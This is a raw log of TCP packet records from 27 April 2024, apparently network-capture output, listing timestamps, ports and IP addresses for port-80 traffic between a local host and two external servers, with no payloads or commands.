Apr 27, 2024 02:19:38.404771090 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.404800892 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.404808998 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.404836893 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.412961006 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.413002014 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.413286924 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.413327932 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.413373947 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.413405895 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.413410902 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.413444996 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.413450956 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.413489103 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.421355009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.421375990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.421411991 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.421560049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.421593904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.421629906 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.517858982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.517899036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.517920971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.517945051 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.518009901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.518049955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.518071890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.518122911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.518157959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.560396910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.560420990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.560455084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.575702906 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.575716972 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.575740099 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.575769901 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.575793028 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.576371908 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.576417923 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.576514006 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.576560020 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.583951950 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.583997965 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.584037066 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.584078074 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.584301949 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.584320068 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.584352016 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.584376097 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.584604025 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.584646940 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.584738016 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.584777117 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.617491007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.617547989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.617562056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.617587090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.617750883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.617796898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.713267088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.713288069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.713339090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.713412046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.713498116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.713538885 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.713584900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.713643074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.713684082 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.713757992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.746525049 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.746573925 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.746608019 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.746608019 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.746676922 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.746733904 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.746743917 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.746784925 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.747359037 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.747371912 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.747404099 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.747419119 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.754471064 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.754515886 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.754637003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.754677057 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.754771948 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.754810095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.754813910 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.754859924 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.754898071 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.754937887 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.755019903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.755037069 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.755073071 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.755111933 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.755151987 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.808959007 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.811892986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.812009096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.812069893 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.812084913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.812263012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.812320948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.909041882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.909126997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.909141064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.909171104 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.909205914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.909246922 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.909362078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.909388065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.909426928 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:38.917258978 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.917309046 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.917377949 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.917419910 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.917473078 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.917512894 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.918082952 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.918133020 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.918222904 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.918265104 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.925672054 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.925715923 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.925765991 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.925808907 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.925914049 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.925955057 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.925978899 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.926047087 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.926081896 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.926095009 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.926131010 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.926229954 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:38.926271915 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.926273108 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:38.951675892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.951915979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:38.951961994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.005150080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.007747889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.007792950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.007898092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.008193016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.008232117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.008289099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.058933020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.089205980 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.089257956 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.089271069 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.089303017 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.089317083 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.089358091 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.089400053 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.089445114 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.089487076 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.089529991 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.089544058 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.089586020 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.098021984 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.098115921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.098865032 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.098879099 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.098911047 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.098928928 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.098929882 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.098974943 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.099040031 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.099091053 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.103298903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.103377104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.103419065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.103497982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.103585005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.103631973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.103647947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.103797913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.103811026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.103842974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.147104025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.147167921 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.147274017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.199570894 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.203442097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.203454971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.203512907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.203768015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.203854084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.203896999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.253514051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.260046005 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.260114908 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.260127068 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.260128021 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.260138035 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.260160923 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.260162115 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.260169983 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.260174990 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.260186911 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.260195017 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.260200024 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.260210991 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.260241032 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.269081116 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.269138098 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.269731045 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.269743919 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.269777060 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.269790888 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.270059109 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.270102024 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.270129919 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.270170927 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.297939062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.297991037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.298029900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.298053026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.298067093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.298079014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.298091888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.298094034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.298124075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.298125029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.298163891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.341670990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.341768980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.341814995 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.393578053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.397753954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.397767067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.397779942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.397800922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.397805929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.397828102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.397860050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.397916079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.430973053 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.430994034 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.431006908 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.431051970 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.431070089 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.431108952 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.431149960 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.431235075 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.431252003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.431288958 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.431305885 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.431349039 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.431391954 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.431442022 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.431489944 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.439764977 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.439778090 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.439830065 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.440421104 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.440433025 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.440474987 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.440876007 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.440888882 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.440916061 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.440943003 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.493191004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.493417025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.493468046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.493490934 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.493582010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.493669033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.493705988 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.493808031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.493824959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.493846893 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.493952036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.493988991 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.494019032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.536263943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.536320925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.536371946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.590193033 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.593399048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.593473911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.593487024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.593513966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.593663931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.593703032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.593715906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.593797922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.593853951 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.601813078 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.601828098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.601857901 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.601871014 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.601874113 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.601912022 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.601912022 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.601912022 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.601918936 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.601958990 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.601972103 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.602014065 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.602037907 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.602078915 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.610897064 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.610914946 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.610949039 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.610965014 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.611712933 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.611726046 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.611810923 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.611810923 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.612204075 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.612255096 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.612267017 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:39.612270117 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.612344980 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.612344980 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:39.688594103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.688658953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.688673019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.688709021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.688782930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.688802958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.688827038 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.688888073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.688929081 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.689095974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.689112902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.689153910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.689155102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.730827093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:39.732728004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.732769012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:39.732815027 CEST	49734	80	192.168.2.4	176.97.76.106
